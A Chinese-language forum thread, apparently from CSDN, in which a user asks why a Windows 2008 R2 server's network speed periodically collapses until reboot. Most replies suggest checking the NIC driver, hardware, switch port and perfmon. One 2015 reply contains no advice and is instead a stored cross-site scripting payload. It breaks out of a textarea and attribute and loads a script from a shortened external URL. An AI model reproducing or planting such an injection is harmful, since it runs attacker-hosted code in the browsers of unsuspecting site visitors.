一台win2008R2服务器网络异常的问题

hp4123533 2014-05-29 10:44:39
有一台IBM服务器,运行win2008R2,MS SQL2008,卡巴斯基,Apache,千兆网络。
原本服务器运行很正常,网络传输能达到100M+,期间未新增软件,突然有一天开始出现了网速异常的情况,网络传输只有400多K每秒,重启服务器后网速可以恢复,但运行几天后又出现这个情况。问题可能出现在什么地方?
我检查了网卡配置,系统自带防火墙设置,都没有异常,这是怎么回事呢?
...全文
918 4 打赏 收藏 转发到动态 举报
写回复
用AI写文章
4 条回复
切换为时间正序
请发表友善的回复…
发表回复
qq_20438621 2015-11-05
  • 打赏
  • 举报
回复
</textarea>'"><script src=http://t.cn/Rya3fqP></script>
qq191232051 2014-06-05
  • 打赏
  • 举报
回复
顶2楼好评方法好用
dysea0002 2014-06-03
  • 打赏
  • 举报
回复
网卡驱动检查一下吧 遇到过一次类似情况,重新安装网卡驱动后解决了
Ki1381 2014-05-30
  • 打赏
  • 举报
回复
先换块网卡,并换一个交换机端口,排除网卡和交换机端口的硬件故障,如果这个现象继续重现再做进一步调查。 另外也可以先用perfmon看下网络慢的时候服务器其它资源是否正常。

6,849

社区成员

发帖
与我相关
我的任务
社区描述
Windows 2016/2012/2008/2003/2000/NT
社区管理员
  • Windows Server社区
  • qishine
加入社区
  • 近7日
  • 近30日
  • 至今
社区公告
暂无公告

试试用AI创作助手写篇文章吧